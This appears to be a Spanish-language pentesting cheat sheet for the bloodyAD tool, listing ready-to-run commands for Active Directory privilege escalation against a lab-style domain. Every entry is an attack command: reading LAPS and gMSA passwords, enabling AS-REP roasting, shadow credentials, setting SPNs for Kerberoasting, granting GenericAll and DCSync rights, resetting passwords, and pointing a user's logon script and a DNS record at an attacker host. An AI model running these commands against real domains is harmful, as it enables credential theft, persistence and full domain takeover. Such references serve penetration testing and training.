Introduction
Esta herramienta puede realizar llamadas LDAP específicas a un controlador de dominio para realizar escalada de privilegios en AD.
En Kali Linux la herramienta se puede instalar simplemente a través del siguiente comando.
Copiar sudo apt install bloodyad -y
Repositorio de GitHub de la herramienta
Attacking AD using bloodyAD
# Leer LAPS Password
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
# Leer GMSA Password
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword
# Habilitar DONT_REQ_PREAUTH para ASREP Roast (Necesario disponer permisos GenericAll/GenericWrite)
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH
# Deshabilitar ACCOUNTDISABLE para habilitar a un usuario deshabilitado
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE
# Añadir usuario a un grupo
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'
# Shadow Credentials Attack (luego hay que hacer unPacTheHash)
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'target'
# Asignar servicePrincipalName (SPN) a un usuario para Kerberoasting Attack ( Necesario disponer permisos GenericAll/GenericWrite sobre el usuario $target
)
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
# Hacer propietario a usuario sobre un objeto ( permisos de WriteOwner )
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
# Asignar permisos GenericAll sobre un usuario a un objeto para tener control total
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'usuario' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
# Cambiar contraseña de un usuario
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'
# Añadir permisos DCSync sobre un objeto
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'
# Asignamos al usuario 'TARGET' un script malicioso que se ejecutará cuando inicie sesión
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'
# Creamos un nuevo registro DNS, para posteriormente realizar ataques de DNS Spoofing.
Copiar bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>